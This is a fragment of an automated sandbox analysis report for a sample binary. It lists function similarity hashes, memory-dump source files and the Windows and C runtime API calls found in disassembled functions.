                                                                                                                                    • Opcode ID: 42d9586ebb42a9cf7abdc7323e9034dc7e167f2c854d3b2aa395bab966b1fa25
                                                                                                                                    • Instruction ID: 0423c085308683a302fd665b8909dd04c6a59aee34b955bddc8f810ee3e4723e
                                                                                                                                    • Opcode Fuzzy Hash: 42d9586ebb42a9cf7abdc7323e9034dc7e167f2c854d3b2aa395bab966b1fa25
                                                                                                                                    • Instruction Fuzzy Hash: 9412D6B16187069FC72ACF28C490679B7E1FF94304F10892EE99AC7781E338E555DB45
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: ce974bf8a3c5c88f282c71c0424c8b8ecbb83ccc4c962fba693f84f1f08f4bf3
                                                                                                                                    • Instruction ID: c8f55f8d02c8417de349a875c903d38af384d42ef3bd84cf808147767d7a8a76
                                                                                                                                    • Opcode Fuzzy Hash: ce974bf8a3c5c88f282c71c0424c8b8ecbb83ccc4c962fba693f84f1f08f4bf3
                                                                                                                                    • Instruction Fuzzy Hash: C3F1CD316283018FC716CF28C49863ABBE5EF89314F15AA2EF4C5D725AD730E905CB56
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: H_prolog
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3519838083-0
                                                                                                                                    • Opcode ID: 2980be0e212b7233c95cb586bc08cdf2d70386884da6558b15a1596fe5d8ca77
                                                                                                                                    • Instruction ID: c50022afca3cb80faf81fc769043b4e1fa87ac960c36e09b86b8cdfe295d1514
                                                                                                                                    • Opcode Fuzzy Hash: 2980be0e212b7233c95cb586bc08cdf2d70386884da6558b15a1596fe5d8ca77
                                                                                                                                    • Instruction Fuzzy Hash: BBD1F4716087408FDB35CF28C85175BBBE0BF89308F09856DE88D9B642D778E909CB56
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 93699971d7bf4f42b260e625c8a681fec5b76b1457b1feb0ae363b432b84952a
                                                                                                                                    • Instruction ID: 6578b4bac643d61e9ca5edfefde6a1cc9ed8c02bc29746f3fa8ed1a21c48e081
                                                                                                                                    • Opcode Fuzzy Hash: 93699971d7bf4f42b260e625c8a681fec5b76b1457b1feb0ae363b432b84952a
                                                                                                                                    • Instruction Fuzzy Hash: A6E126755083908FC345CF29D89486ABFF0AF9A300F49495EF9C497392C335EA19DB92
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 099330c7f7ccdd417e25f555c4bfc52021962f4fe602807f6dd12a6fe714b0d5
                                                                                                                                    • Instruction ID: 2247c7723b00381923a6da82b8c1b2c642ab69dbfac614734133eb4a7eae6201
                                                                                                                                    • Opcode Fuzzy Hash: 099330c7f7ccdd417e25f555c4bfc52021962f4fe602807f6dd12a6fe714b0d5
                                                                                                                                    • Instruction Fuzzy Hash: C29189B02047498BDB36EF64D890BBE77C9EB50300F10892DF59ECB282EB38A555C752
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 24399a2ad99dde1ffdfe4095f328d7bde986876a5c10afdb0a2a788d37c48f2a
                                                                                                                                    • Instruction ID: 99e896decbdc2d6bd74e0cdc6011dff598a8761deba24938c1442c78236e65b0
                                                                                                                                    • Opcode Fuzzy Hash: 24399a2ad99dde1ffdfe4095f328d7bde986876a5c10afdb0a2a788d37c48f2a
                                                                                                                                    • Instruction Fuzzy Hash: D38168713043468BDB37DE68C8C0BBD77D4AB91304F00C92DE98E8F682DB78A9859752
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: a130b21aa496ec926d489e722fc6376dc6859589348575b2a43d2eb38fbb2a5a
                                                                                                                                    • Instruction ID: 94c5a9e9b14853bf4165cab5d92a55baeed07fefc909ae04f50859596e072757
                                                                                                                                    • Opcode Fuzzy Hash: a130b21aa496ec926d489e722fc6376dc6859589348575b2a43d2eb38fbb2a5a
                                                                                                                                    • Instruction Fuzzy Hash: 3661BB39640F0857DF3BBA786891BBE6398EF51340F550DDAE483DF681DA91DD428301
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: b9fa34869b2d82e3d8411e2c45cb22e435dbce3bfada8ed8319a2114c0e74f89
                                                                                                                                    • Instruction ID: 55c5bcb4755805645e37a1da21db674f441d3c9b61e31c8d0aa0394d41e8376b
                                                                                                                                    • Opcode Fuzzy Hash: b9fa34869b2d82e3d8411e2c45cb22e435dbce3bfada8ed8319a2114c0e74f89
                                                                                                                                    • Instruction Fuzzy Hash: CB517BA1204F4557DF377A28895ABBF23C99B12304F1909DDE983DFA82C605EE05C3D1
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 4403c1aefed5637abd8dfc2c35a67a22c78d3ba6d9dc80744688a0e0892956ec
                                                                                                                                    • Instruction ID: b3da9c58fa09853c9897c296bc10e42c5ba5c04167eab488504b9535123dc11c
                                                                                                                                    • Opcode Fuzzy Hash: 4403c1aefed5637abd8dfc2c35a67a22c78d3ba6d9dc80744688a0e0892956ec
                                                                                                                                    • Instruction Fuzzy Hash: DC51F3315093D58FC703CF39D55046EBFE0AE9A314F4A49ADE4D95B247C231DA4ACB62
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: bdbed9b5303bb61bc775235c42beefd1d6a1ff618febf51a01ffa4ca50a681cf
                                                                                                                                    • Instruction ID: 0ae6c66e3ba1449e58d4d1605877ed70236333c659a3555adbb7b9efe06b48ab
                                                                                                                                    • Opcode Fuzzy Hash: bdbed9b5303bb61bc775235c42beefd1d6a1ff618febf51a01ffa4ca50a681cf
                                                                                                                                    • Instruction Fuzzy Hash: 4E51E0B1A087119FC748CF19D48055AF7E1FF88314F058A2EE899E3340D734E959CB96
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 39963e26f0f32bb957082511270cc61aa548dbbc85140380b543ac3b2cb39bde
                                                                                                                                    • Instruction ID: c40d61874474d8868eeee055ce3860808490de3be8a899477b5b23bf40404cb0
                                                                                                                                    • Opcode Fuzzy Hash: 39963e26f0f32bb957082511270cc61aa548dbbc85140380b543ac3b2cb39bde
                                                                                                                                    • Instruction Fuzzy Hash: E131D5B2A147568FCB25DF28C85116ABBE0FB95304F10852DE499D7741C739EA0ACB92
                                                                                                                                    APIs
                                                                                                                                    • _swprintf.LIBCMT ref: 0036E30E
                                                                                                                                      • Part of subcall function 00364092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 003640A5
                                                                                                                                      • Part of subcall function 00371DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,003A1030,00000200,0036D928,00000000,?,00000050,003A1030), ref: 00371DC4
                                                                                                                                    • _strlen.LIBCMT ref: 0036E32F
                                                                                                                                    • SetDlgItemTextW.USER32(?,0039E274,?), ref: 0036E38F
                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 0036E3C9
                                                                                                                                    • GetClientRect.USER32(?,?), ref: 0036E3D5
                                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 0036E475
                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 0036E4A2
                                                                                                                                    • SetWindowTextW.USER32(?,?), ref: 0036E4DB
                                                                                                                                    • GetSystemMetrics.USER32(00000008), ref: 0036E4E3
                                                                                                                                    • GetWindow.USER32(?,00000005), ref: 0036E4EE
                                                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 0036E51B
                                                                                                                                    • GetWindow.USER32(00000000,00000002), ref: 0036E58D
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
                                                                                                                                    • String ID: $%s:$CAPTION$d$t9
                                                                                                                                    • API String ID: 2407758923-2433586919
                                                                                                                                    • Opcode ID: 4fab73c9f98abac5aae20e51391c96fceb18f4fd1623dbe1570df70694637336
                                                                                                                                    • Instruction ID: f4dbd80d3ccb0fd6d38cf860c576374aace6694f3306b8eebe65834430a55f25
                                                                                                                                    • Opcode Fuzzy Hash: 4fab73c9f98abac5aae20e51391c96fceb18f4fd1623dbe1570df70694637336
                                                                                                                                    • Instruction Fuzzy Hash: 1181B272208301AFD712DF68CC89E6FBBE9EF88704F04491DFA85D7254D671E9098B52
                                                                                                                                    APIs
                                                                                                                                    • ___free_lconv_mon.LIBCMT ref: 0038CB66
                                                                                                                                      • Part of subcall function 0038C701: _free.LIBCMT ref: 0038C71E
                                                                                                                                      • Part of subcall function 0038C701: _free.LIBCMT ref: 0038C730
                                                                                                                                      • Part of subcall function 0038C701: _free.LIBCMT ref: 0038C742
                                                                                                                                      • Part of subcall function 0038C701: _free.LIBCMT ref: 0038C754
                                                                                                                                      • Part of subcall function 0038C701: _free.LIBCMT ref: 0038C766
                                                                                                                                      • Part of subcall function 0038C701: _free.LIBCMT ref: 0038C778
                                                                                                                                      • Part of subcall function 0038C701: _free.LIBCMT ref: 0038C78A
                                                                                                                                      • Part of subcall function 0038C701: _free.LIBCMT ref: 0038C79C
                                                                                                                                      • Part of subcall function 0038C701: _free.LIBCMT ref: 0038C7AE
                                                                                                                                      • Part of subcall function 0038C701: _free.LIBCMT ref: 0038C7C0
                                                                                                                                      • Part of subcall function 0038C701: _free.LIBCMT ref: 0038C7D2
                                                                                                                                      • Part of subcall function 0038C701: _free.LIBCMT ref: 0038C7E4
                                                                                                                                      • Part of subcall function 0038C701: _free.LIBCMT ref: 0038C7F6
                                                                                                                                    • _free.LIBCMT ref: 0038CB5B
                                                                                                                                      • Part of subcall function 00388DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0038C896,?,00000000,?,00000000,?,0038C8BD,?,00000007,?,?,0038CCBA,?), ref: 00388DE2
                                                                                                                                      • Part of subcall function 00388DCC: GetLastError.KERNEL32(?,?,0038C896,?,00000000,?,00000000,?,0038C8BD,?,00000007,?,?,0038CCBA,?,?), ref: 00388DF4
                                                                                                                                    • _free.LIBCMT ref: 0038CB7D
                                                                                                                                    • _free.LIBCMT ref: 0038CB92
                                                                                                                                    • _free.LIBCMT ref: 0038CB9D
                                                                                                                                    • _free.LIBCMT ref: 0038CBBF
                                                                                                                                    • _free.LIBCMT ref: 0038CBD2
                                                                                                                                    • _free.LIBCMT ref: 0038CBE0
                                                                                                                                    • _free.LIBCMT ref: 0038CBEB
                                                                                                                                    • _free.LIBCMT ref: 0038CC23
                                                                                                                                    • _free.LIBCMT ref: 0038CC2A
                                                                                                                                    • _free.LIBCMT ref: 0038CC47
                                                                                                                                    • _free.LIBCMT ref: 0038CC5F
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                    • String ID: h9
                                                                                                                                    • API String ID: 161543041-554728239
                                                                                                                                    • Opcode ID: 36ba1aee02b6e554c74fac25baeaa83e669c2acfadc22f14b2ba0ad6e5ae8524
                                                                                                                                    • Instruction ID: d2c217fe15187b72ee245c6186fb6734c74bfa3ce5e9ae65b32cdb5d6d4b3ab5
                                                                                                                                    • Opcode Fuzzy Hash: 36ba1aee02b6e554c74fac25baeaa83e669c2acfadc22f14b2ba0ad6e5ae8524
                                                                                                                                    • Instruction Fuzzy Hash: 05315A316107459FEB23BB38D846B5AB7FAAF10310F6164A9E048DA292DF30AC45CB20
                                                                                                                                    APIs
                                                                                                                                    • _free.LIBCMT ref: 00389705
                                                                                                                                      • Part of subcall function 00388DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0038C896,?,00000000,?,00000000,?,0038C8BD,?,00000007,?,?,0038CCBA,?), ref: 00388DE2
                                                                                                                                      • Part of subcall function 00388DCC: GetLastError.KERNEL32(?,?,0038C896,?,00000000,?,00000000,?,0038C8BD,?,00000007,?,?,0038CCBA,?,?), ref: 00388DF4
                                                                                                                                    • _free.LIBCMT ref: 00389711
                                                                                                                                    • _free.LIBCMT ref: 0038971C
                                                                                                                                    • _free.LIBCMT ref: 00389727
                                                                                                                                    • _free.LIBCMT ref: 00389732
                                                                                                                                    • _free.LIBCMT ref: 0038973D
                                                                                                                                    • _free.LIBCMT ref: 00389748
                                                                                                                                    • _free.LIBCMT ref: 00389753
                                                                                                                                    • _free.LIBCMT ref: 0038975E
                                                                                                                                    • _free.LIBCMT ref: 0038976C
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                                                    • String ID: 0d9
                                                                                                                                    • API String ID: 776569668-2243828265
                                                                                                                                    • Opcode ID: 274b5b4d5167f9761c38dce0868d1cb8bc80fe55fbe939276279225de372ec60
                                                                                                                                    • Instruction ID: 223f141fb98f491d8d54d07eedacea47b7ba0bffd7687a7d648b3de2531fdc7a
                                                                                                                                    • Opcode Fuzzy Hash: 274b5b4d5167f9761c38dce0868d1cb8bc80fe55fbe939276279225de372ec60
                                                                                                                                    • Instruction Fuzzy Hash: 1811B376110249BFCB02FF94C982DDD3BB6EF14350B9154A1FA088F262DE32EE559B84
                                                                                                                                    APIs
                                                                                                                                    • _wcslen.LIBCMT ref: 00379736
                                                                                                                                    • _wcslen.LIBCMT ref: 003797D6
                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,?), ref: 003797E5
                                                                                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 00379806
                                                                                                                                    • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 0037982D
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
